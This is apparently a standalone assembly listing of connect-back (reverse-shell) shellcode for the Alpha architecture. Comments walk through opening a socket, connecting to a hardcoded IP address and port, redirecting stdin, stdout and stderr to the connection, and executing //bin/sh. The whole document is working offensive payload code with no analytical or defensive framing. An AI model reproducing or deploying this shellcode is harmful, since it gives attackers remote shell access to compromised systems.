Connect-Back Shellcode

 #include <alpha/regdef.h> #include <alpha/pal.h>   .text   .arch     generic   .align 4   .globl  main   .ent      main main:   .frame  $sp, 0,                       #148 bytes total size.                      #xorloop will give us the pc in a0     bic  sp, 0xf, sp     #make sure the stack is 16 byte aligned. addq a0, 0x70, s1    #address of sockaddr_in. s1 preserved addq a0, 0x88, s4    #address of //bin/sh    stq  s4, (sp)        #store address of //bin/sh stq  zero, 8(sp)     mov  0x2, a0         #AF_INET mov  0x1, a1         #SOCK_STREAM bis  zero, zero, a2  #0 addq zero, 0x61, v0  #socket syscall PAL_callsys mov  v0, s0          #saved register, preserved. store socket number.     mov  s0, a0          #socket number mov  s1, a1          #addr of sockaddr_in mov  0x10, a2        #sizeof sockaddr_in equals 16 addq zero, 0x62, v0  #connect syscall PAL_callsys     mov 0x2, s2 duploop: mov  s0, a0          #socket number. mov  s2, a1          #stdin, stdout, stderr. addq zero, 0x5a, v0  #dup2 syscall. PAL_callsys subq s2, 0x1, s2     #decrement the counter. bge  s2, duploop     #loop for 2,1,0 (stderr, stdout, stdin).     mov  s4, a0          #address of //bin/sh mov  sp, a1          #address of (address of //bin/sh) bis  zero, zero, a2  #NULL addq zero, 0x3b, v0  #execve syscall PAL_callsys     .long   0x901f0002   #port number  .long   0x0100007f   #ip addr .long   0x00000000       .long   0x00000000 .long   0x10 .long   0x00000000 .quad   0x68732f6e69622f2f .long   0x00000000 .end        main